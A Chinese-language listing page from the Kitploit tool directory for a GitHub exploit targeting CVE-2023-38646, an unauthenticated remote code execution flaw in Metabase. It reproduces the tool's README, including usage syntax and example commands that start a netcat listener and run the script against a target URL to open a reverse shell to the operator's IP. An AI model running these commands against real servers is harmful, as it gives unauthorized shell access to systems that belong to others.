Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-38646 — CVE-2023-38646 Metabase 中的未认证远程代码执行(RCE)漏洞 | Kitploit
工具/GitHubGitHub/nickswink/cve-2023-38646
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubnickswink/cve-2023-38646

CVE-2023-38646

CVE-2023-38646 Metabase 中的未认证远程代码执行(RCE)漏洞

查看仓库
322年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-38646-exploit

"该漏洞被编号为 CVE-2023–38646,允许攻击者在无需任何身份验证的情况下在服务器上执行任意命令。"

一个针对 cve-2023-38646 的快速反向 Shell 漏洞利用脚本。 这个漏洞并非我发现的,我只是编写了这个脚本。

使用方法

root@kitploit:~
root@box:~/CVE-2023-38646# python3 exploit.py

   _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __

/ ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
| |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
| |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
\_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/

author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py


Usage: python3 exploit.py <url> <local-ip> <local-port>

使用基础 URL 以及本地 IP 和端口运行,以获取反向 Shell

root@kitploit:~
root@box:~/CVE-2023-38646# nc -lvnp 4444

root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

image

致谢

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py

下载工具